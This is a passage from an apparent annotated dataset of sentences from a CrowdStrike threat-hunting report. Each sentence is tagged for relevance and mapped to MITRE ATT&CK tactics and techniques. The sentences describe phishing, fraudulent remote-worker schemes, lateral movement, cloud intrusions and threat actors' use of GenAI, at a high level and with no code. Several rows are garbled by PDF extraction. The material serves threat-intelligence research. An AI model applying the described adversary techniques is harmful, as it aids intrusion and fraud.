TECHNOLOGY TECHNOLOGY SERVICES* MANUFACTURING GOVERNMENT HOSPITALITY UTILITIES TELECOMS*", "sentence_text": "OCULAR PUNK SCION SPIDER SPIDER SPIDER SERVICES* FINANCIAL* TECHNOLOGY SERVICES*", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p7-s38-d38034", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 7, "sentence_id": 38, "context_before": "OCULAR PUNK SCION SPIDER SPIDER SPIDER SERVICES* FINANCIAL* TECHNOLOGY SERVICES*", "sentence_text": "= CONSULTING AND PROFESSIONAL SERVICES FINANCIAL* TECHNOLOGY FINANCIAL* = FINANCIAL SERVICES HEALTHCARE TELECOMS*", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p7-s39-1ca97b", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 7, "sentence_id": 39, "context_before": "= CONSULTING AND PROFESSIONAL SERVICES FINANCIAL* TECHNOLOGY FINANCIAL* = FINANCIAL SERVICES HEALTHCARE TELECOMS*", "sentence_text": "= TELECOMMUNICATIONS MANUFACTURING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p8-s40-806ed1", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 8, "sentence_id": 40, "context_before": "= TELECOMMUNICATIONS MANUFACTURING", "sentence_text": "They are using publicly available models to aid their reconnaissance, vulnerability research, and phishing campaign content and payload development.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" }, { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1595", "name": "Active Scanning" }, { "id": "T1566", "name": "Phishing" } ], "procedure": "Use publicly available models to support reconnaissance, vulnerability research, and phishing campaign development.", "entities": [ { "text": "are using publicly available models to aid their reconnaissance, vulnerability research, and phishing campaign content and payload development", "start": 5, "end": 147, "label": "Action" } ] }, { "uid": "crowdstrike-45_crowdstrike_report-p9-s41-a09046", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 9, "sentence_id": 41, "context_before": "They are using publicly available models to aid their reconnaissance, vulnerability research, and phishing campaign content and payload development.", "sentence_text": "EXECUTIVE SUMMARY\nAdversary use of GenAI spans three primary vectors, each with distinct adoption patterns and impact:\nSOCIAL ENGINEERING TECHNICAL OPERATIONS INFORMATION OPERATIONS", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p9-s42-a21da0", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 9, "sentence_id": 42, "context_before": "EXECUTIVE SUMMARY\nAdversary use of GenAI spans three primary vectors, each with distinct adoption patterns and impact:\nSOCIAL ENGINEERING TECHNICAL OPERATIONS INFORMATION OPERATIONS", "sentence_text": "Phishing sophistication: Enhanced reconnaissance: Disinformation content:\nGenerates convincing email and Enhances collection and analysis Generates multimedia content, BEC scams with natural language of organizational infrastructure, including deepfakes of known and contextually aware content personnel profiles, and individuals, audio, images, and vulnerabilities text Identity generation:\nCreates digital persona Vulnerability exploitation: Infrastructure creation:\nnetworks with supporting profiles Assists exploit developers by Establishes credible-looking and social media activity accelerating research, POC media websites and social development, and code networks for large-scale Social engineering optimization: generation information broadcasting Develops relevant documents, technical materials, and other Malware advancement: Multilingual adaptation:\ncontent to maximize target Creates, translates, and Creates targeted propaganda responses enhances malicious code with by automatically translating and new capabilities and features culturally adapting content Intelligence observed Provides troubleshooting, Russian GRU Military CHARMING KITTEN code generation/optimization, Unit 29155 to which CHARMING conducting phishing and execution guidance EMBER BEAR operations", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p9-s43-7fb399", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 9, "sentence_id": 43, "context_before": "Phishing sophistication: Enhanced reconnaissance: Disinformation content:\nGenerates convincing email and Enhances collection and analysis Generates multimedia content, BEC scams with natural language of organizational infrastructure, including deepfakes of known and contextually aware content personnel profiles, and individuals, audio, images, and vulnerabilities text Identity generation:\nCreates digital persona Vulnerability exploitation: Infrastructure creation:\nnetworks with supporting profiles Assists exploit developers by Establishes credible-looking and social media activity accelerating research, POC media websites and social development, and code networks for large-scale Social engineering optimization: generation information broadcasting Develops relevant documents, technical materials, and other Malware advancement: Multilingual adaptation:\ncontent to maximize target Creates, translates, and Creates targeted propaganda responses enhances malicious code with by automatically translating and new capabilities and features culturally adapting content Intelligence observed Provides troubleshooting, Russian GRU Military CHARMING KITTEN code generation/optimization, Unit 29155 to which CHARMING conducting phishing and execution guidance EMBER BEAR operations", "sentence_text": "KITTEN campaigns against EU during attacks EMBER have been attributed and U.S. entities BEAR has reportedly financed throughout 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p9-s44-827df4", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 9, "sentence_id": 44, "context_before": "KITTEN campaigns against EU during attacks EMBER have been attributed and U.S. entities BEAR has reportedly financed throughout 2024.", "sentence_text": "Analysis of their pro-Russia propagandist Malware families such as message structure and industry John Mark Dougan's AI FunkLocker and SparkCat reporting suggests CHARMING infrastructure, contributing to leverage GenAI.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p9-s45-342111", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 9, "sentence_id": 45, "context_before": "Analysis of their pro-Russia propagandist Malware families such as message structure and industry John Mark Dougan's AI FunkLocker and SparkCat reporting suggests CHARMING infrastructure, contributing to leverage GenAI.", "sentence_text": "KITTEN has likely adopted AI for prolific website and media MALWARE FunkLocker has repetitive phishing content generation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p9-s47-86bb71", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 9, "sentence_id": 47, "context_before": "generation.", "sentence_text": "code structure and unnecessary code additions, and it was reportedly created using the RENAISSANCE SPIDER’s unrestricted LLM WormGPT.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p9-s48-36e03c", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 9, "sentence_id": 48, "context_before": "code structure and unnecessary code additions, and it was reportedly created using the RENAISSANCE SPIDER’s unrestricted LLM WormGPT.", "sentence_text": "October 2024 and SparkCat mobile malware uses March 2025 ClickFix AI-powered optical character RENAISSANCE lures appear recognition (OCR) to selectively SPIDER identical, except exfiltrate images that match that the March 2025 certain criteria.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Use OCR capability to selectively identify and exfiltrate images matching predefined criteria.", "entities": [ { "text": "SparkCat mobile malware", "start": 17, "end": 40, "label": "MalwareTool" }, { "text": "exfiltrate images", "start": 178, "end": 195, "label": "Action" } ] }, { "uid": "crowdstrike-45_crowdstrike_report-p9-s49-e7c6ac", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 9, "sentence_id": 49, "context_before": "October 2024 and SparkCat mobile malware uses March 2025 ClickFix AI-powered optical character RENAISSANCE lures appear recognition (OCR) to selectively SPIDER identical, except exfiltrate images that match that the March 2025 certain criteria.", "sentence_text": "lure likely used GenAI for the Ukrainian translation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p9-s50-6e3333", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 9, "sentence_id": 50, "context_before": "lure likely used GenAI for the Ukrainian translation.", "sentence_text": "The verification prompt text, which includes “Of course!", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p9-s51-974cda", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 9, "sentence_id": 51, "context_before": "The verification prompt text, which includes “Of course!", "sentence_text": "Here’s the translation of your request in Ukrainian” before the actual translated sentence, suggests RENAISSANCE SPIDER copied the entire response from an LLM.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p10-s52-2f00f5", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 10, "sentence_id": 52, "context_before": "Here’s the translation of your request in Ukrainian” before the actual translated sentence, suggests RENAISSANCE SPIDER copied the entire response from an LLM.", "sentence_text": "EXECUTIVE SUMMARY\nFAMOUS CHOLLIMA Leads in GenAI-Supported Operations Democratic People’s Republic of Korea (DPRK)-nexus adversary FAMOUS CHOLLIMA conducts insider threat operations at an exceptionally high operational tempo.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p10-s53-d1f189", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 10, "sentence_id": 53, "context_before": "EXECUTIVE SUMMARY\nFAMOUS CHOLLIMA Leads in GenAI-Supported Operations Democratic People’s Republic of Korea (DPRK)-nexus adversary FAMOUS CHOLLIMA conducts insider threat operations at an exceptionally high operational tempo.", "sentence_text": "In the past 12 months, CrowdStrike OverWatch investigated over 320 incidents where FAMOUS CHOLLIMA operatives obtained fraudulent employment as remote software developers.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Obtain fraudulent employment as remote software developers to gain legitimate access to target environments.", "entities": [ { "text": "FAMOUS CHOLLIMA operatives", "start": 83, "end": 109, "label": "ThreatActor" }, { "text": "obtained fraudulent employment as remote software developers", "start": 110, "end": 170, "label": "Action" } ] }, { "uid": "crowdstrike-45_crowdstrike_report-p10-s54-e995ec", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 10, "sentence_id": 54, "context_before": "In the past 12 months, CrowdStrike OverWatch investigated over 320 incidents where FAMOUS CHOLLIMA operatives obtained fraudulent employment as remote software developers.", "sentence_text": "FAMOUS CHOLLIMA has been able to sustain this pace by interweaving GenAI-powered tools that automate and optimize workflows at every stage of the hiring and employment process.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p10-s55-35f686", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 10, "sentence_id": 55, "context_before": "FAMOUS CHOLLIMA has been able to sustain this pace by interweaving GenAI-powered tools that automate and optimize workflows at every stage of the hiring and employment process.", "sentence_text": "Though some specific technical implementation details remain speculative, the breadth of evidence from multiple sources presents a clear picture of an adversary deeply invested in leveraging GenAI to enhance their operational capabilities and scale their deceptive employment schemes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p10-s56-6bda66", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 10, "sentence_id": 56, "context_before": "Though some specific technical implementation details remain speculative, the breadth of evidence from multiple sources presents a clear picture of an adversary deeply invested in leveraging GenAI to enhance their operational capabilities and scale their deceptive employment schemes.", "sentence_text": "FAMOUS CHOLLIMA is highly likely to continue to rely on GenAI tools to facilitate success throughout their IT worker operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p10-s57-7a0d92", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 10, "sentence_id": 57, "context_before": "FAMOUS CHOLLIMA is highly likely to continue to rely on GenAI tools to facilitate success throughout their IT worker operations.", "sentence_text": "INTERVIEWS\nAPPLICATIONS\nMask true identity during Draft résumés and cover video interview letters Assist in answering Create synthetic interview questions and identities, including completing technical altered photos coding assignments Build tools for Present as more fluent in researching jobs English and more qualified Track and manage job applications ONON THETHE", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p10-s58-74f73c", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 10, "sentence_id": 58, "context_before": "INTERVIEWS\nAPPLICATIONS\nMask true identity during Draft résumés and cover video interview letters Assist in answering Create synthetic interview questions and identities, including completing technical altered photos coding assignments Build tools for Present as more fluent in researching jobs English and more qualified Track and manage job applications ONON THETHE", "sentence_text": "JOBJOB Assist in daily tasks and correspondence, ensuring answers are accurate both technically and grammatically Manage and respond to various streams of communication likely stemming from multiple jobs worked simultaneously GenAI enhances threat actors' operations rather than replacing existing attack methodologies.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p10-s59-fcdd7a", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 10, "sentence_id": 59, "context_before": "JOBJOB Assist in daily tasks and correspondence, ensuring answers are accurate both technically and grammatically Manage and respond to various streams of communication likely stemming from multiple jobs worked simultaneously GenAI enhances threat actors' operations rather than replacing existing attack methodologies.", "sentence_text": "GenAI is not likely to definitively benefit offensive or defensive operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p10-s60-81fff2", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 10, "sentence_id": 60, "context_before": "GenAI is not likely to definitively benefit offensive or defensive operations.", "sentence_text": "Rather, more sophisticated users will likely maintain their advantage in exploiting GenAI's potential, especially in technical operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p10-s61-754df8", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 10, "sentence_id": 61, "context_before": "Rather, more sophisticated users will likely maintain their advantage in exploiting GenAI's potential, especially in technical operations.", "sentence_text": "This is partly because AI-generated code still requires significant human expertise to be effective.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p10-s62-b2837f", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 10, "sentence_id": 62, "context_before": "This is partly because AI-generated code still requires significant human expertise to be effective.", "sentence_text": "Though defenders can use AI for security capabilities, organizations’ continued AI tooling integration creates an expanded attack surface that threat actors will likely seek to exploit by directly targeting AI applications.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p11-s63-1f3996", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 11, "sentence_id": 63, "context_before": "Though defenders can use AI for security capabilities, organizations’ continued AI tooling integration creates an expanded attack surface that threat actors will likely seek to exploit by directly targeting AI applications.", "sentence_text": "These attacks are challenging to detect because activities are distributed, resulting in a reduced footprint within each individual security domain.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p11-s64-7df1d8", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 11, "sentence_id": 64, "context_before": "These attacks are challenging to detect because activities are distributed, resulting in a reduced footprint within each individual security domain.", "sentence_text": "Adversaries are also becoming more adept at finding and pivoting to unmanaged hosts on target networks, seeking to bypass traditional security measures such as endpoint detection and response (EDR).", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1021", "name": "Remote Services" } ], "procedure": "Find and pivot to unmanaged hosts within target networks to continue operations.", "entities": [ { "text": "finding and pivoting to unmanaged hosts on target networks", "start": 44, "end": 102, "label": "Action" } ] }, { "uid": "crowdstrike-45_crowdstrike_report-p11-s65-273ee6", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 11, "sentence_id": 65, "context_before": "Adversaries are also becoming more adept at finding and pivoting to unmanaged hosts on target networks, seeking to bypass traditional security measures such as endpoint detection and response (EDR).", "sentence_text": "By implementing innovative hunting solutions, organizations can effectively broaden their threat hunting field by adding more data sources.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p11-s66-3293fb", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 11, "sentence_id": 66, "context_before": "By implementing innovative hunting solutions, organizations can effectively broaden their threat hunting field by adding more data sources.", "sentence_text": "This enhanced visibility enables fast and comprehensive hunting and investigations, ensuring better protection against evolving threats.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p11-s67-815f2f", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 11, "sentence_id": 67, "context_before": "This enhanced visibility enables fast and comprehensive hunting and investigations, ensuring better protection against evolving threats.", "sentence_text": "IDENTITY HUNTING\nVishing and help desk social engineering have continued to play a dominant role in eCrime operations in 2025.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p11-s68-b95567", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 11, "sentence_id": 68, "context_before": "IDENTITY HUNTING\nVishing and help desk social engineering have continued to play a dominant role in eCrime operations in 2025.", "sentence_text": "Adversaries are bypassing traditional security measures by exploiting human weaknesses, leveraging compromised credentials and social engineering to gain initial access and move laterally within organizations.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0008", "name": "Lateral Movement" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" }, { "id": "T1566", "name": "Phishing" }, { "id": "T1021", "name": "Remote Services" } ], "procedure": "Exploit human weaknesses and leverage compromised credentials and social engineering to bypass defenses, gain initial access, and move laterally within organizations.", "entities": [ { "text": "bypassing traditional security measures by exploiting human weaknesses, leveraging compromised credentials and social engineering to gain initial access and move laterally within organizations", "start": 16, "end": 208, "label": "Action" } ] }, { "uid": "crowdstrike-45_crowdstrike_report-p11-s69-0c0f30", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 11, "sentence_id": 69, "context_before": "Adversaries are bypassing traditional security measures by exploiting human weaknesses, leveraging compromised credentials and social engineering to gain initial access and move laterally within organizations.", "sentence_text": "It is difficult for a single security tool to distinguish between a legitimate employee and an adversary using stolen credentials, leaving organizations vulnerable to identity-driven attacks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p11-s70-25e91a", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 11, "sentence_id": 70, "context_before": "It is difficult for a single security tool to distinguish between a legitimate employee and an adversary using stolen credentials, leaving organizations vulnerable to identity-driven attacks.", "sentence_text": "The rise of this social engineering trend was identified in the number seen in 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p11-s71-ad2002", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 11, "sentence_id": 71, "context_before": "The rise of this social engineering trend was identified in the number seen in 2024.", "sentence_text": "This means that vishing is on track to double last year's volume by the end of 2025.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p11-s72-6575c1", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 11, "sentence_id": 72, "context_before": "This means that vishing is on track to double last year's volume by the end of 2025.", "sentence_text": "JAN FEB MAR APR MAY JUN JUL AUG SEP", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p11-s73-9ece7d", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 11, "sentence_id": 73, "context_before": "JAN FEB MAR APR MAY JUN JUL AUG SEP", "sentence_text": "OCT NOV DEC JAN FEB MAR APR MAY JUN 2024 2025", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p12-s74-efada2", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 12, "sentence_id": 74, "context_before": "OCT NOV DEC JAN FEB MAR APR MAY JUN 2024 2025", "sentence_text": "Over the past 12 months, CrowdStrike OverWatch observed a 40% increase in cloud intrusions associated with China-nexus adversaries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p12-s75-6495dd", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 12, "sentence_id": 75, "context_before": "Over the past 12 months, CrowdStrike OverWatch observed a 40% increase in cloud intrusions associated with China-nexus adversaries.", "sentence_text": "This increase suggests cloud exploitation continues to be a key focus for these adversaries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p12-s76-3a8cf2", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 12, "sentence_id": 76, "context_before": "This increase suggests cloud exploitation continues to be a key focus for these adversaries.", "sentence_text": "The cloud’s vast data, scalability, and exploitable misconfigurations enable adversaries to achieve persistence, move laterally, and exfiltrate data.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p12-s77-d760f2", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 12, "sentence_id": 77, "context_before": "The cloud’s vast data, scalability, and exploitable misconfigurations enable adversaries to achieve persistence, move laterally, and exfiltrate data.", "sentence_text": "Two China-nexus adversaries — GENESIS PANDA and MURKY PANDA — have proven to be particularly adept at navigating cloud environments over the past year, each showcasing different techniques that require different hunting strategies.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p12-s78-c4c70d", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 12, "sentence_id": 78, "context_before": "Two China-nexus adversaries — GENESIS PANDA and MURKY PANDA — have proven to be particularly adept at navigating cloud environments over the past year, each showcasing different techniques that require different hunting strategies.", "sentence_text": "GENESIS PANDA conducts high-volume operations with less emphasis on operational security and a suspected role as an access broker.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p12-s79-86eaeb", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 12, "sentence_id": 79, "context_before": "GENESIS PANDA conducts high-volume operations with less emphasis on operational security and a suspected role as an access broker.", "sentence_text": "MURKY PANDA is a more sophisticated and elusive adversary prioritizing evasion techniques in the cloud and using trusted relationships for initial access.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1199", "name": "Trusted Relationship" } ], "procedure": "Use trusted relationships to gain initial access to target environments.", "entities": [ { "text": "MURKY PANDA", "start": 0, "end": 11, "label": "ThreatActor" }, { "text": "using trusted relationships for initial access", "start": 107, "end": 153, "label": "Action" } ] }, { "uid": "crowdstrike-45_crowdstrike_report-p12-s80-857f1a", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 12, "sentence_id": 80, "context_before": "MURKY PANDA is a more sophisticated and elusive adversary prioritizing evasion techniques in the cloud and using trusted relationships for initial access.", "sentence_text": "2025 CLOUD HUNTING BY THE NUMBERS •", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p12-s81-b99b4f", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 12, "sentence_id": 81, "context_before": "2025 CLOUD HUNTING BY THE NUMBERS •", "sentence_text": "Leveraging CrowdStrike Falcon® Cloud Security telemetry, intrusions in the first half of 2025 compared to all of 2024 •", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p12-s82-572333", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 12, "sentence_id": 82, "context_before": "Leveraging CrowdStrike Falcon® Cloud Security telemetry, intrusions in the first half of 2025 compared to all of 2024 •", "sentence_text": "Over the past 12 months, CrowdStrike OverWatch observed a 40% increase in cloud-conscious intrusions by suspected China-nexus actors", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p13-s83-466da9", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 13, "sentence_id": 83, "context_before": "Over the past 12 months, CrowdStrike OverWatch observed a 40% increase in cloud-conscious intrusions by suspected China-nexus actors", "sentence_text": "EXECUTIVE SUMMARY\nInitial Access Execution Persistence Privilege Escalation Defense Evasion T1078.004 T1651", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p13-s84-141a3b", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 13, "sentence_id": 84, "context_before": "EXECUTIVE SUMMARY\nInitial Access Execution Persistence Privilege Escalation Defense Evasion T1078.004 T1651", "sentence_text": "Command SSH Authorized Keys Accounts Authentication Material:\nApplication Access Token T1190 T1098.001 T1098.003 Exploit Public-Facing Account Manipulation: Account Manipulation: T1562.007 Application Additional Cloud Additional Cloud Roles Impair Defenses: Disable Credentials or Modify Cloud Firewall T1195 Supply Chain Compromise T1070", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p13-s85-33e43e", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 13, "sentence_id": 85, "context_before": "Command SSH Authorized Keys Accounts Authentication Material:\nApplication Access Token T1190 T1098.001 T1098.003 Exploit Public-Facing Account Manipulation: Account Manipulation: T1562.007 Application Additional Cloud Additional Cloud Roles Impair Defenses: Disable Credentials or Modify Cloud Firewall T1195 Supply Chain Compromise T1070", "sentence_text": "Indicator Removal T1619 Cloud Storage Object Discovery T1552.005 Unsecured Credentials: T1016 T1114.002 Cloud Instance Metadata System Network Email Collection:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p13-s86-c39bf4", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 13, "sentence_id": 86, "context_before": "Indicator Removal T1619 Cloud Storage Object Discovery T1552.005 Unsecured Credentials: T1016 T1114.002 Cloud Instance Metadata System Network Email Collection:", "sentence_text": "Remote T1090.002 API Configuration Discovery Email Collection Proxy: External Proxy Credential Access Discovery Collection Command and Control MURKY PANDA GENESIS PANDA BOTH KEY", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p14-s87-1ebf30", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 14, "sentence_id": 87, "context_before": "Remote T1090.002 API Configuration Discovery Email Collection Proxy: External Proxy Credential Access Discovery Collection Command and Control MURKY PANDA GENESIS PANDA BOTH KEY", "sentence_text": "EXECUTIVE SUMMARY\nENDPOINT HUNTING\nThough fast-moving adversaries often dominate the threat landscape, equally dangerous threats operate on extended timelines.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p14-s88-8648b8", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 14, "sentence_id": 88, "context_before": "EXECUTIVE SUMMARY\nENDPOINT HUNTING\nThough fast-moving adversaries often dominate the threat landscape, equally dangerous threats operate on extended timelines.", "sentence_text": "These patient predators prioritize stealth and persistence, executing meticulous “long game” strategies that include sustained access, covert data harvesting, and environmental preparation for future operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p14-s89-1633d3", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 14, "sentence_id": 89, "context_before": "These patient predators prioritize stealth and persistence, executing meticulous “long game” strategies that include sustained access, covert data harvesting, and environmental preparation for future operations.", "sentence_text": "Their minimal digital footprint allows them to blend seamlessly into legitimate network traffic, making detection exceptionally challenging.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p14-s90-44677b", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 14, "sentence_id": 90, "context_before": "Their minimal digital footprint allows them to blend seamlessly into legitimate network traffic, making detection exceptionally challenging.", "sentence_text": "China-nexus adversaries have increasingly mastered this approach.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p14-s91-66f89b", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 14, "sentence_id": 91, "context_before": "China-nexus adversaries have increasingly mastered this approach.", "sentence_text": "This is particularly evident in their increased targeting of the telecommunications sector.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p14-s92-e36f19", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 14, "sentence_id": 92, "context_before": "This is particularly evident in their increased targeting of the telecommunications sector.", "sentence_text": "the telecommunications sector over the past 12 months.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p14-s93-89669b", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 14, "sentence_id": 93, 